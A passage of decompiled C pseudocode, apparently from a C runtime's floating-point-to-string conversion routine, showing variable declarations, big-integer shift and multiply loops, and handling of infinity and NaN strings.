				signed int _t1090;
				signed int _t1094;
				signed int _t1095;
				signed int _t1096;
				signed int _t1098;
				signed int _t1099;
				signed int _t1100;
				signed int _t1101;
				signed int _t1102;
				signed int _t1103;
				signed int _t1105;
				signed int _t1106;
				signed int _t1107;
				signed int _t1108;
				signed int _t1109;
				signed int _t1110;
				unsigned int _t1111;
				void* _t1114;
				intOrPtr _t1116;
				signed int _t1117;
				signed int _t1118;
				signed int _t1119;
				signed int* _t1123;
				void* _t1127;
				void* _t1128;
				signed int _t1129;
				signed int _t1130;
				signed int _t1131;
				signed int _t1134;
				signed int _t1135;
				signed int _t1140;
				void* _t1142;
				signed int _t1143;
				signed int _t1146;
				char _t1151;
				signed int _t1153;
				signed int _t1154;
				signed int _t1155;
				signed int _t1156;
				signed int _t1157;
				signed int _t1158;
				signed int _t1159;
				signed int _t1163;
				signed int _t1164;
				signed int _t1165;
				signed int _t1166;
				signed int _t1167;
				unsigned int _t1170;
				void* _t1174;
				void* _t1175;
				unsigned int _t1176;
				signed int _t1181;
				signed int _t1182;
				signed int _t1184;
				signed int _t1185;
				intOrPtr* _t1187;
				signed int _t1188;
				signed int _t1190;
				signed int _t1191;
				signed int _t1194;
				signed int _t1196;
				signed int _t1197;
				void* _t1198;
				signed int _t1199;
				signed int _t1200;
				signed int _t1201;
				void* _t1204;
				signed int _t1205;
				signed int _t1206;
				signed int _t1207;
				signed int _t1208;
				signed int _t1209;
				signed int* _t1212;
				signed int _t1213;
				signed int _t1214;
				signed int _t1215;
				signed int _t1216;
				intOrPtr* _t1218;
				intOrPtr* _t1219;
				signed int _t1221;
				signed int _t1223;
				signed int _t1226;
				signed int _t1232;
				signed int _t1236;
				signed int _t1237;
				signed int _t1242;
				signed int _t1245;
				signed int _t1246;
				signed int _t1247;
				signed int _t1248;
				signed int _t1249;
				signed int _t1250;
				signed int _t1252;
				signed int _t1253;
				signed int _t1254;
				signed int _t1255;
				signed int _t1257;
				signed int _t1258;
				signed int _t1259;
				signed int _t1260;
				signed int _t1261;
				signed int _t1263;
				signed int _t1264;
				signed int _t1266;
				signed int _t1268;
				signed int _t1270;
				signed int _t1273;
				signed int _t1275;
				signed int* _t1276;
				signed int* _t1279;
				signed int _t1288;

				_t1142 = __edx;
				_t1273 = _t1275;
				_t1276 = _t1275 - 0x964;
				_t743 =  *0x1cd668; // 0x44aa1787
				_v8 = _t743 ^ _t1273;
				_t1055 = _a20;
				_push(__esi);
				_push(__edi);
				_t1187 = _a16;
				_v1924 = _t1187;
				_v1920 = _t1055;
				E001BC078( &_v1944, __eflags);
				_t1236 = _a8;
				_t748 = 0x2d;
				if((_t1236 & 0x80000000) == 0) {
					_t748 = 0x120;
				}
				 *_t1187 = _t748;
				 *((intOrPtr*)(_t1187 + 8)) = _t1055;
				_t1188 = _a4;
				if((_t1236 & 0x7ff00000) != 0) {
					L5:
					_t753 = E001B86BF( &_a4);
					_pop(_t1070);
					__eflags = _t753;
					if(_t753 != 0) {
						_t1070 = _v1924;
						 *((intOrPtr*)(_v1924 + 4)) = 1;
					}
					_t754 = _t753 - 1;
					__eflags = _t754;
					if(_t754 == 0) {
						_push("1#INF");
						goto L308;
					} else {
						_t777 = _t754 - 1;
						__eflags = _t777;
						if(_t777 == 0) {
							_push("1#QNAN");
							goto L308;
						} else {
							_t778 = _t777 - 1;
							__eflags = _t778;
							if(_t778 == 0) {
								_push("1#SNAN");
								goto L308;
							} else {
								__eflags = _t778 == 1;
								if(_t778 == 1) {
									_push("1#IND");
									goto L308;
								} else {
									_v1928 = _v1928 & 0x00000000;
									_a4 = _t1188;
									_a8 = _t1236 & 0x7fffffff;
									_t1288 = _a4;
									asm("fst qword [ebp-0x768]");
									_t1190 = _v1896;
									_v1916 = _a12 + 1;
									_t1077 = _t1190 >> 0x14;
									_t784 = _t1077 & 0x000007ff;
									__eflags = _t784;
									if(_t784 != 0) {
										_t1143 = 0;
										_t784 = 0;
										__eflags = 0;
									} else {
										_t1143 = 1;
									}
									_t1191 = _t1190 & 0x000fffff;
									_t1058 = _v1900 + _t784;
									asm("adc edi, esi");
									__eflags = _t1143;
									_t1078 = _t1077 & 0x000007ff;
									_t1242 = _t1078 - 0x434 + (0 | _t1143 != 0x00000000) + 1;
									_v1872 = _t1242;
									E001BE0C0(_t1078, _t1288);
									_push(_t1078);
									_push(_t1078);
									 *_t1276 = _t1288;
									_t790 = E001C0F10(E001BE1D0(_t1191, _t1242), _t1288);
									_v1904 = _t790;
									__eflags = _t790 - 0x7fffffff;
									if(_t790 == 0x7fffffff) {
										L16:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t790 - 0x80000000;
										if(_t790 == 0x80000000) {
											goto L16;
										}
									}
									_v468 = _t1058;
									__eflags = _t1191;
									_v464 = _t1191;
									_t1061 = (0 | _t1191 != 0x00000000) + 1;
									_v472 = _t1061;
									__eflags = _t1242;
									if(_t1242 < 0) {
										__eflags = _t1242 - 0xfffffc02;
										if(_t1242 == 0xfffffc02) {
											L101:
											_t792 =  *((intOrPtr*)(_t1273 + _t1061 * 4 - 0x1d4));
											_t195 =  &_v1896;
											 *_t195 = _v1896 & 0x00000000;
											__eflags =  *_t195;
											asm("bsr eax, eax");
											if( *_t195 == 0) {
												_t1081 = 0;
												__eflags = 0;
											} else {
												_t1081 = _t792 + 1;
											}
											_t793 = 0x20;
											_t794 = _t793 - _t1081;
											__eflags = _t794 - 1;
											_t795 = _t794 & 0xffffff00 | _t794 - 0x00000001 > 0x00000000;
											__eflags = _t1061 - 0x73;
											_v1865 = _t795;
											_t1082 = _t1081 & 0xffffff00 | _t1061 - 0x00000073 > 0x00000000;
											__eflags = _t1061 - 0x73;
											if(_t1061 != 0x73) {
												L107:
												_t796 = 0;
												__eflags = 0;
											} else {
												__eflags = _t795;
												if(_t795 == 0) {
													goto L107;
												} else {
													_t796 = 1;
												}
											}
											__eflags = _t1082;
											if(_t1082 != 0) {
												L126:
												_v1400 = _v1400 & 0x00000000;
												_t224 =  &_v472;
												 *_t224 = _v472 & 0x00000000;
												__eflags =  *_t224;
												E001BAA64( &_v468, 0x1cc,  &_v1396, 0);
												_t1276 =  &(_t1276[4]);
											} else {
												__eflags = _t796;
												if(_t796 != 0) {
													goto L126;
												} else {
													_t1109 = 0x72;
													__eflags = _t1061 - _t1109;
													if(_t1061 < _t1109) {
														_t1109 = _t1061;
													}
													__eflags = _t1109 - 0xffffffff;
													if(_t1109 != 0xffffffff) {
														_t1260 = _t1109;
														_t1218 =  &_v468 + _t1109 * 4;
														_v1880 = _t1218;
														while(1) {
															__eflags = _t1260 - _t1061;
															if(_t1260 >= _t1061) {
																_t208 =  &_v1876;
																 *_t208 = _v1876 & 0x00000000;
																__eflags =  *_t208;
															} else {
																_v1876 =  *_t1218;
															}
															_t210 = _t1260 - 1; // 0x70
															__eflags = _t210 - _t1061;
															if(_t210 >= _t1061) {
																_t1170 = 0;
																__eflags = 0;
															} else {
																_t1170 =  *(_t1218 - 4);
															}
															_t1218 = _t1218 - 4;
															_t972 = _v1880;
															_t1260 = _t1260 - 1;
															 *_t972 = _t1170 >> 0x0000001f ^ _v1876 + _v1876;
															_v1880 = _t972 - 4;
															__eflags = _t1260 - 0xffffffff;
															if(_t1260 == 0xffffffff) {
																break;
															}
															_t1061 = _v472;
														}
														_t1242 = _v1872;
													}
													__eflags = _v1865;
													if(_v1865 == 0) {
														_v472 = _t1109;
													} else {
														_t218 = _t1109 + 1; // 0x73
														_v472 = _t218;
													}
												}
											}
											_t1194 = 1 - _t1242;
											E001AE920(_t1194,  &_v1396, 0, 1);
											__eflags = 1;
											 *(_t1273 + 0xbad63d) = 1 << (_t1194 & 0x0000001f);
											_t805 = 0xbadbae;
										} else {
											_v1396 = _v1396 & 0x00000000;
											_t1110 = 2;
											_v1392 = 0x100000;
											_v1400 = _t1110;
											__eflags = _t1061 - _t1110;
											if(_t1061 == _t1110) {
												_t1174 = 0;
												__eflags = 0;
												while(1) {
													_t974 =  *((intOrPtr*)(_t1273 + _t1174 - 0x570));
													__eflags = _t974 -  *((intOrPtr*)(_t1273 + _t1174 - 0x1d0));
													if(_t974 !=  *((intOrPtr*)(_t1273 + _t1174 - 0x1d0))) {
														goto L101;
													}
													_t1174 = _t1174 + 4;
													__eflags = _t1174 - 8;
													if(_t1174 != 8) {
														continue;
													} else {
														_t166 =  &_v1896;
														 *_t166 = _v1896 & 0x00000000;
														__eflags =  *_t166;
														asm("bsr eax, edi");
														if( *_t166 == 0) {
															_t1175 = 0;
															__eflags = 0;
														} else {
															_t1175 = _t974 + 1;
														}
														_t975 = 0x20;
														_t1261 = _t1110;
														__eflags = _t975 - _t1175 - _t1110;
														_t977 =  &_v460;
														_v1880 = _t977;
														_t1219 = _t977;
														_t171 =  &_v1865;
														 *_t171 = _t975 - _t1175 - _t1110 > 0;
														__eflags =  *_t171;
														while(1) {
															__eflags = _t1261 - _t1061;
															if(_t1261 >= _t1061) {
																_t173 =  &_v1876;
																 *_t173 = _v1876 & 0x00000000;
																__eflags =  *_t173;
															} else {
																_v1876 =  *_t1219;
															}
															_t175 = _t1261 - 1; // 0x0
															__eflags = _t175 - _t1061;
															if(_t175 >= _t1061) {
																_t1176 = 0;
																__eflags = 0;
															} else {
																_t1176 =  *(_t1219 - 4);
															}
															_t1219 = _t1219 - 4;
															_t981 = _v1880;
															_t1261 = _t1261 - 1;
															 *_t981 = _t1176 >> 0x0000001e ^ _v1876 << 0x00000002;
															_v1880 = _t981 - 4;
															__eflags = _t1261 - 0xffffffff;
															if(_t1261 == 0xffffffff) {
																break;
															}
															_t1061 = _v472;
														}
														__eflags = _v1865;
														_t1111 = _t1110 - _v1872;
														_v472 = (0 | _v1865 != 0x00000000) + _t1110;
														_t1221 = _t1111 >> 5;
														_v1884 = _t1111;
														_t1263 = _t1221 << 2;
														E001AE920(_t1221,  &_v1396, 0, _t1263);
														 *(_t1273 + _t1263 - 0x570) = 1 << (_v1884 & 0x0000001f);
														_t805 = _t1221 + 1;
													}
													goto L128;
												}
											}
											goto L101;
										}
										L128:
										_v1400 = _t805;
										_t1064 = 0x1cc;
										_v936 = _t805;
										__eflags = _t805 << 2;
										E001BAA64( &_v932, 0x1cc,  &_v1396, _t805 << 2);
										_t1279 =  &(_t1276[7]);
									} else {
										_v1396 = _v1396 & 0x00000000;
										_t1264 = 2;
										_v1392 = 0x100000;
										_v1400 = _t1264;
										__eflags = _t1061 - _t1264;
										if(_t1061 != _t1264) {
											L53:
											_t992 = _v1872 + 1;
											_t993 = _t992 & 0x0000001f;
											_t1114 = 0x20;
											_v1876 = _t993;
											_t1223 = _t992 >> 5;
											_v1872 = _t1223;
											_v1908 = _t1114 - _t993;
											_t996 = E001ADDA0(1, _t1114 - _t993, 0);
											_t1116 =  *((intOrPtr*)(_t1273 + _t1061 * 4 - 0x1d4));
											_t997 = _t996 - 1;
											_t108 =  &_v1896;
											 *_t108 = _v1896 & 0x00000000;
											__eflags =  *_t108;
											asm("bsr ecx, ecx");
											_v1884 = _t997;
											_v1912 =  !_t997;
											if( *_t108 == 0) {
												_t1117 = 0;
												__eflags = 0;
											} else {
												_t1117 = _t1116 + 1;
											}
											_t999 = 0x20;
											_t1000 = _t999 - _t1117;
											_t1181 = _t1061 + _t1223;
											__eflags = _v1876 - _t1000;
											_v1892 = _t1181;
											_t1001 = _t1000 & 0xffffff00 | _v1876 - _t1000 > 0x00000000;
											__eflags = _t1181 - 0x73;
											_v1865 = _t1001;
											_t1118 = _t1117 & 0xffffff00 | _t1181 - 0x00000073 > 0x00000000;
											__eflags = _t1181 - 0x73;
											if(_t1181 != 0x73) {
												L59:
												_t1002 = 0;
												__eflags = 0;
											} else {
												__eflags = _t1001;
												if(_t1001 == 0) {
													goto L59;
												} else {
													_t1002 = 1;
												}
											}
											__eflags = _t1118;
											if(_t1118 != 0) {
												L81:
												__eflags = 0;
												_t1064 = 0x1cc;
												_v1400 = 0;
												_v472 = 0;
												E001BAA64( &_v468, 0x1cc,  &_v1396, 0);
												_t1276 =  &(_t1276[4]);
											} else {
												__eflags = _t1002;
												if(_t1002 != 0) {
													goto L81;
												} else {
													_t1119 = 0x72;
													__eflags = _t1181 - _t1119;
													if(_t1181 >= _t1119) {
														_t1181 = _t1119;
														_v1892 = _t1119;
													}
													_t1012 = _t1181;
													_v1880 = _t1012;
													__eflags = _t1181 - 0xffffffff;
													if(_t1181 != 0xffffffff) {
														_t1182 = _v1872;
														_t1266 = _t1181 - _t1182;
														__eflags = _t1266;
														_t1123 =  &_v468 + _t1266 * 4;
														_v1888 = _t1123;
														while(1) {
															__eflags = _t1012 - _t1182;
															if(_t1012 < _t1182) {
																break;
															}
															__eflags = _t1266 - _t1061;
															if(_t1266 >= _t1061) {
																_t1226 = 0;
																__eflags = 0;
															} else {
																_t1226 =  *_t1123;
															}
															__eflags = _t1266 - 1 - _t1061;
															if(_t1266 - 1 >= _t1061) {
																_t1017 = 0;
																__eflags = 0;
															} else {
																_t1017 =  *(_t1123 - 4);
															}
															_t1020 = _v1880;
															_t1123 = _v1888 - 4;
															_v1888 = _t1123;
															 *(_t1273 + _t1020 * 4 - 0x1d0) = (_t1226 & _v1884) << _v1876 | (_t1017 & _v1912) >> _v1908;
															_t1012 = _t1020 - 1;
															_t1266 = _t1266 - 1;
															_v1880 = _t1012;
															__eflags = _t1012 - 0xffffffff;
															if(_t1012 != 0xffffffff) {
																_t1061 = _v472;
																continue;
															}
															break;
														}
														_t1181 = _v1892;
														_t1223 = _v1872;
														_t1264 = 2;
													}
													__eflags = _t1223;
													if(_t1223 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1223 << 2);
														_t1276 =  &(_t1276[3]);
													}
													__eflags = _v1865;
													_t1064 = 0x1cc;
													if(_v1865 == 0) {
														_v472 = _t1181;
													} else {
														_v472 = _t1181 + 1;
													}
												}
											}
											_v1392 = _v1392 & 0x00000000;
											_v1396 = _t1264;
											_v1400 = 1;
											_v936 = 1;
											_push(4);
										} else {
											_t1127 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1273 + _t1127 - 0x570)) -  *((intOrPtr*)(_t1273 + _t1127 - 0x1d0));
												if( *((intOrPtr*)(_t1273 + _t1127 - 0x570)) !=  *((intOrPtr*)(_t1273 + _t1127 - 0x1d0))) {
													goto L53;
												}
												_t1127 = _t1127 + 4;
												__eflags = _t1127 - 8;
												if(_t1127 != 8) {
													continue;
												} else {
													_t1023 = _v1872 + 2;
													_t1024 = _t1023 & 0x0000001f;
													_t1128 = 0x20;
													_t1129 = _t1128 - _t1024;
													_v1888 = _t1024;
													_t1268 = _t1023 >> 5;
													_v1876 = _t1268;
													_v1908 = _t1129;
													_t1027 = E001ADDA0(1, _t1129, 0);
													_v1896 = _v1896 & 0x00000000;
													_t1028 = _t1027 - 1;
													__eflags = _t1028;
													asm("bsr ecx, edi");
													_v1884 = _t1028;
													_v1912 =  !_t1028;
													if(_t1028 == 0) {
														_t1130 = 0;
														__eflags = 0;
													} else {
														_t1130 = _t1129 + 1;
													}
													_t1030 = 0x20;
													_t1031 = _t1030 - _t1130;
													_t1184 = _t1268 + 2;
													__eflags = _v1888 - _t1031;
													_v1880 = _t1184;
													_t1032 = _t1031 & 0xffffff00 | _v1888 - _t1031 > 0x00000000;
													__eflags = _t1184 - 0x73;
													_v1865 = _t1032;
													_t1131 = _t1130 & 0xffffff00 | _t1184 - 0x00000073 > 0x00000000;
													__eflags = _t1184 - 0x73;
													if(_t1184 != 0x73) {
														L28:
														_t1033 = 0;
														__eflags = 0;
													} else {
														__eflags = _t1032;
														if(_t1032 == 0) {
															goto L28;
														} else {
															_t1033 = 1;
														}
													}
													__eflags = _t1131;
													if(_t1131 != 0) {
														L50:
														__eflags = 0;
														_t1064 = 0x1cc;
														_v1400 = 0;
														_v472 = 0;
														E001BAA64( &_v468, 0x1cc,  &_v1396, 0);
														_t1276 =  &(_t1276[4]);
													} else {
														__eflags = _t1033;
														if(_t1033 != 0) {
															goto L50;
														} else {
															_t1134 = 0x72;
															__eflags = _t1184 - _t1134;
															if(_t1184 >= _t1134) {
																_t1184 = _t1134;
																_v1880 = _t1134;
															}
															_t1135 = _t1184;
															_v1892 = _t1135;
															__eflags = _t1184 - 0xffffffff;
															if(_t1184 != 0xffffffff) {
																_t1185 = _v1876;
																_t1270 = _t1184 - _t1185;
																__eflags = _t1270;
																_t1043 =  &_v468 + _t1270 * 4;
																_v1872 = _t1043;
																while(1) {
																	__eflags = _t1135 - _t1185;
																	if(_t1135 < _t1185) {
																		break;
																	}
																	__eflags = _t1270 - _t1061;
																	if(_t1270 >= _t1061) {
																		_t1232 = 0;
																		__eflags = 0;
																	} else {
																		_t1232 =  *_t1043;
																	}
																	__eflags = _t1270 - 1 - _t1061;
																	if(_t1270 - 1 >= _t1061) {
																		_t1045 = 0;
																		__eflags = 0;
																	} else {
																		_t1045 =  *(_v1872 - 4);
																	}
																	_t1140 = _v1892;
																	 *(_t1273 + _t1140 * 4 - 0x1d0) = (_t1045 & _v1912) >> _v1908 | (_t1232 & _v1884) << _v1888;
																	_t1135 = _t1140 - 1;
																	_t1270 = _t1270 - 1;
																	_t1043 = _v1872 - 4;
																	_v1892 = _t1135;
																	_v1872 = _t1043;
																	__eflags = _t1135 - 0xffffffff;
																	if(_t1135 != 0xffffffff) {
																		_t1061 = _v472;
																		continue;
																	}
																	break;
																}
																_t1184 = _v1880;
																_t1268 = _v1876;
															}
															__eflags = _t1268;
															if(_t1268 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1268 << 2);
																_t1276 =  &(_t1276[3]);
															}
															__eflags = _v1865;
															_t1064 = 0x1cc;
															if(_v1865 == 0) {
																_v472 = _t1184;
															} else {
																_v472 = _t1184 + 1;
															}
														}
													}
													_v1392 = _v1392 & 0x00000000;
													_t1038 = 4;
													__eflags = 1;
													_v1396 = _t1038;
													_v1400 = 1;
													_v936 = 1;
													_push(_t1038);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
										_push( &_v1396);
										_push(_t1064);
										_push( &_v932);
										E001BAA64();
										_t1279 =  &(_t1276[4]);
									}
									_t810 = _v1904;
									_t1084 = 0xa;
									_v1912 = _t1084;
									__eflags = _t810;
									if(_t810 < 0) {
										_t811 =  ~_t810;
										_t812 = _t811 / _t1084;
										_v1880 = _t812;
										_t1085 = _t811 % _t1084;
										_v1884 = _t1085;
										__eflags = _t812;
										if(_t812 == 0) {
											L249:
											__eflags = _t1085;
											if(_t1085 != 0) {
												_t849 =  *(0x1c6a9c + _t1085 * 4);
												_v1896 = _t849;
												__eflags = _t849;
												if(_t849 == 0) {
													L260:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L261;
												} else {
													__eflags = _t849 - 1;
													if(_t849 != 1) {
														_t1096 = _v472;
														__eflags = _t1096;
														if(_t1096 != 0) {
															_t1201 = 0;
															_t1250 = 0;
															__eflags = 0;
															do {
																_t1155 = _t849 *  *(_t1273 + _t1250 * 4 - 0x1d0) >> 0x20;
																 *(_t1273 + _t1250 * 4 - 0x1d0) = _t849 *  *(_t1273 + _t1250 * 4 - 0x1d0) + _t1201;
																_t849 = _v1896;
																asm("adc edx, 0x0");
																_t1250 = _t1250 + 1;
																_t1201 = _t1155;
																__eflags = _t1250 - _t1096;
															} while (_t1250 != _t1096);
															__eflags = _t1201;
															if(_t1201 != 0) {
																_t856 = _v472;
																__eflags = _t856 - 0x73;
																if(_t856 >= 0x73) {
																	goto L260;
																} else {
																	 *(_t1273 + _t856 * 4 - 0x1d0) = _t1201;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t812 - 0x26;
												if(_t812 > 0x26) {
													_t812 = 0x26;
												}
												_t1097 =  *(0x1c6a06 + _t812 * 4) & 0x000000ff;
												_v1872 = _t812;
												_v1400 = ( *(0x1c6a06 + _t812 * 4) & 0x000000ff) + ( *(0x1c6a07 + _t812 * 4) & 0x000000ff);
												E001AE920(_t1097 << 2,  &_v1396, 0, _t1097 << 2);
												_t867 = E001AEA80( &(( &_v1396)[_t1097]), 0x1c6100 + ( *(0x1c6a04 + _v1872 * 4) & 0x0000ffff) * 4, ( *(0x1c6a07 + _t812 * 4) & 0x000000ff) << 2);
												_t1098 = _v1400;
												_t1279 =  &(_t1279[6]);
												_v1892 = _t1098;
												__eflags = _t1098 - 1;
												if(_t1098 > 1) {
													__eflags = _v472 - 1;
													if(_v472 > 1) {
														__eflags = _t1098 - _v472;
														_t1204 =  &_v1396;
														_t868 = _t867 & 0xffffff00 | _t1098 - _v472 > 0x00000000;
														__eflags = _t868;
														if(_t868 != 0) {
															_t1156 =  &_v468;
														} else {
															_t1204 =  &_v468;
															_t1156 =  &_v1396;
														}
														_v1908 = _t1156;
														__eflags = _t868;
														if(_t868 == 0) {
															_t1098 = _v472;
														}
														_v1876 = _t1098;
														__eflags = _t868;
														if(_t868 != 0) {
															_v1892 = _v472;
														}
														_t1157 = 0;
														_t1252 = 0;
														_v1864 = 0;
														__eflags = _t1098;
														if(_t1098 == 0) {
															L243:
															_v472 = _t1157;
															_t870 = _t1157 << 2;
															__eflags = _t870;
															_push(_t870);
															_t871 =  &_v1860;
															goto L244;
														} else {
															_t1205 = _t1204 -  &_v1860;
															__eflags = _t1205;
															_v1928 = _t1205;
															do {
																_t878 =  *(_t1273 + _t1205 + _t1252 * 4 - 0x740);
																_v1896 = _t878;
																__eflags = _t878;
																if(_t878 != 0) {
																	_t879 = 0;
																	_t1206 = 0;
																	_t1099 = _t1252;
																	_v1888 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L240:
																		__eflags = _t1099 - 0x73;
																		if(_t1099 == 0x73) {
																			goto L258;
																		} else {
																			_t1205 = _v1928;
																			_t1098 = _v1876;
																			goto L242;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1099 - 0x73;
																			if(_t1099 == 0x73) {
																				goto L235;
																			}
																			__eflags = _t1099 - _t1157;
																			if(_t1099 == _t1157) {
																				 *(_t1273 + _t1099 * 4 - 0x740) =  *(_t1273 + _t1099 * 4 - 0x740) & 0x00000000;
																				_t891 = _t879 + 1 + _t1252;
																				__eflags = _t891;
																				_v1864 = _t891;
																				_t879 = _v1888;
																			}
																			_t886 =  *(_v1908 + _t879 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1273 + _t1099 * 4 - 0x740) =  *(_t1273 + _t1099 * 4 - 0x740) + _t886 * _v1896 + _t1206;
																			asm("adc edx, 0x0");
																			_t879 = _v1888 + 1;
																			_t1099 = _t1099 + 1;
																			_v1888 = _t879;
																			_t1206 = _t886 * _v1896 >> 0x20;
																			_t1157 = _v1864;
																			__eflags = _t879 - _v1892;
																			if(_t879 != _v1892) {
																				continue;
																			} else {
																				goto L235;
																			}
																			while(1) {
																				L235:
																				__eflags = _t1206;
																				if(_t1206 == 0) {
																					goto L240;
																				}
																				__eflags = _t1099 - 0x73;
																				if(_t1099 == 0x73) {
																					goto L258;
																				} else {
																					__eflags = _t1099 - _t1157;
																					if(_t1099 == _t1157) {
																						_t558 = _t1273 + _t1099 * 4 - 0x740;
																						 *_t558 =  *(_t1273 + _t1099 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t558;
																						_t564 = _t1099 + 1; // 0x1
																						_v1864 = _t564;
																					}
																					_t884 = _t1206;
																					_t1206 = 0;
																					 *(_t1273 + _t1099 * 4 - 0x740) =  *(_t1273 + _t1099 * 4 - 0x740) + _t884;
																					_t1157 = _v1864;
																					asm("adc edi, edi");
																					_t1099 = _t1099 + 1;
																					continue;
																				}
																				goto L246;
																			}
																			goto L240;
																		}
																		goto L235;
																	}
																} else {
																	__eflags = _t1252 - _t1157;
																	if(_t1252 == _t1157) {
																		 *(_t1273 + _t1252 * 4 - 0x740) =  *(_t1273 + _t1252 * 4 - 0x740) & _t878;
																		_t526 = _t1252 + 1; // 0x1
																		_t1157 = _t526;
																		_v1864 = _t1157;
																	}
																	goto L242;
																}
																goto L246;
																L242:
																_t1252 = _t1252 + 1;
																__eflags = _t1252 - _t1098;
															} while (_t1252 != _t1098);
															goto L243;
														}
													} else {
														_t1207 = _v468;
														_v472 = _t1098;
														E001BAA64( &_v468, _t1064,  &_v1396, _t1098 << 2);
														_t1279 =  &(_t1279[4]);
														__eflags = _t1207;
														if(_t1207 == 0) {
															goto L203;
														} else {
															__eflags = _t1207 - 1;
															if(_t1207 == 1) {
																goto L245;
															} else {
																__eflags = _v472;
																if(_v472 == 0) {
																	goto L245;
																} else {
																	_t1100 = 0;
																	_v1896 = _v472;
																	_t1253 = 0;
																	__eflags = 0;
																	do {
																		_t900 = _t1207;
																		_t1158 = _t900 *  *(_t1273 + _t1253 * 4 - 0x1d0) >> 0x20;
																		 *(_t1273 + _t1253 * 4 - 0x1d0) = _t900 *  *(_t1273 + _t1253 * 4 - 0x1d0) + _t1100;
																		asm("adc edx, 0x0");
																		_t1253 = _t1253 + 1;
																		_t1100 = _t1158;
																		__eflags = _t1253 - _v1896;
																	} while (_t1253 != _v1896);
																	goto L208;
																}
															}
														}
													}
												} else {
													_t1208 = _v1396;
													__eflags = _t1208;
													if(_t1208 != 0) {
														__eflags = _t1208 - 1;
														if(_t1208 == 1) {
															goto L245;
														} else {
															__eflags = _v472;
															if(_v472 == 0) {
																goto L245;
															} else {
																_t1101 = 0;
																_v1896 = _v472;
																_t1254 = 0;
																__eflags = 0;
																do {
																	_t905 = _t1208;
																	_t1159 = _t905 *  *(_t1273 + _t1254 * 4 - 0x1d0) >> 0x20;
																	 *(_t1273 + _t1254 * 4 - 0x1d0) = _t905 *  *(_t1273 + _t1254 * 4 - 0x1d0) + _t1101;
																	asm("adc edx, 0x0");
																	_t1254 = _t1254 + 1;
																	_t1101 = _t1159;
																	__eflags = _t1254 - _v1896;
																} while (_t1254 != _v1896);
																L208:
																__eflags = _t1100;
																if(_t1100 == 0) {
																	goto L245;
																} else {
																	_t903 = _v472;
																	__eflags = _t903 - 0x73;
																	if(_t903 >= 0x73) {
																		L258:
																		_v2408 = 0;
																		_v472 = 0;
																		E001BAA64( &_v468, _t1064,  &_v2404, 0);
																		_t1279 =  &(_t1279[4]);
																		_t874 = 0;
																	} else {
																		 *(_t1273 + _t903 * 4 - 0x1d0) = _t1100;
																		_v472 = _v472 + 1;
																		goto L245;
																	}
																}
															}
														}
													} else {
														L203:
														_v2408 = 0;
														_v472 = 0;
														_push(0);
														_t871 =  &_v2404;
														L244:
														_push(_t871);
														_push(_t1064);
														_push( &_v468);
														E001BAA64();
														_t1279 =  &(_t1279[4]);
														L245:
														_t874 = 1;
													}
												}
												L246:
												__eflags = _t874;
												if(_t874 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_v472 = _v472 & 0x00000000;
													_push(0);
													L261:
													_push( &_v2404);
													_t852 =  &_v468;
													goto L262;
												} else {
													goto L247;
												}
												goto L263;
												L247:
												_t812 = _v1880 - _v1872;
												__eflags = _t812;
												_v1880 = _t812;
											} while (_t812 != 0);
											_t1085 = _v1884;
											goto L249;
										}
									} else {
										_t908 = _t810 / _t1084;
										_v1908 = _t908;
										_t1102 = _t810 % _t1084;
										_v1896 = _t1102;
										__eflags = _t908;
										if(_t908 == 0) {
											L184:
											__eflags = _t1102;
											if(_t1102 != 0) {
												_t1209 =  *(0x1c6a9c + _t1102 * 4);
												__eflags = _t1209;
												if(_t1209 != 0) {
													__eflags = _t1209 - 1;
													if(_t1209 != 1) {
														_t909 = _v936;
														_v1896 = _t909;
														__eflags = _t909;
														if(_t909 != 0) {
															_t1255 = 0;
															_t1103 = 0;
															__eflags = 0;
															do {
																_t910 = _t1209;
																_t1163 = _t910 *  *(_t1273 + _t1103 * 4 - 0x3a0) >> 0x20;
																 *(_t1273 + _t1103 * 4 - 0x3a0) = _t910 *  *(_t1273 + _t1103 * 4 - 0x3a0) + _t1255;
																asm("adc edx, 0x0");
																_t1103 = _t1103 + 1;
																_t1255 = _t1163;
																__eflags = _t1103 - _v1896;
															} while (_t1103 != _v1896);
															__eflags = _t1255;
															if(_t1255 != 0) {
																_t913 = _v936;
																__eflags = _t913 - 0x73;
																if(_t913 >= 0x73) {
																	goto L186;
																} else {
																	 *(_t1273 + _t913 * 4 - 0x3a0) = _t1255;
																	_v936 = _v936 + 1;
																}
															}
														}
													}
												} else {
													L186:
													_v2408 = 0;
													_v936 = 0;
													_push(0);
													goto L190;
												}
											}
										} else {
											do {
												__eflags = _t908 - 0x26;
												if(_t908 > 0x26) {
													_t908 = 0x26;
												}
												_t1104 =  *(0x1c6a06 + _t908 * 4) & 0x000000ff;
												_v1888 = _t908;
												_v1400 = ( *(0x1c6a06 + _t908 * 4) & 0x000000ff) + ( *(0x1c6a07 + _t908 * 4) & 0x000000ff);
												E001AE920(_t1104 << 2,  &_v1396, 0, _t1104 << 2);
												_t926 = E001AEA80( &(( &_v1396)[_t1104]), 0x1c6100 + ( *(0x1c6a04 + _v1888 * 4) & 0x0000ffff) * 4, ( *(0x1c6a07 + _t908 * 4) & 0x000000ff) << 2);
												_t1105 = _v1400;
												_t1279 =  &(_t1279[6]);
												_v1892 = _t1105;
												__eflags = _t1105 - 1;
												if(_t1105 > 1) {
													__eflags = _v936 - 1;
													if(_v936 > 1) {
														__eflags = _t1105 - _v936;
														_t1212 =  &_v1396;
														_t927 = _t926 & 0xffffff00 | _t1105 - _v936 > 0x00000000;
														__eflags = _t927;
														if(_t927 != 0) {
															_t1164 =  &_v932;
														} else {
															_t1212 =  &_v932;
															_t1164 =  &_v1396;
														}
														_v1876 = _t1164;
														__eflags = _t927;
														if(_t927 == 0) {
															_t1105 = _v936;
														}
														_v1880 = _t1105;
														__eflags = _t927;
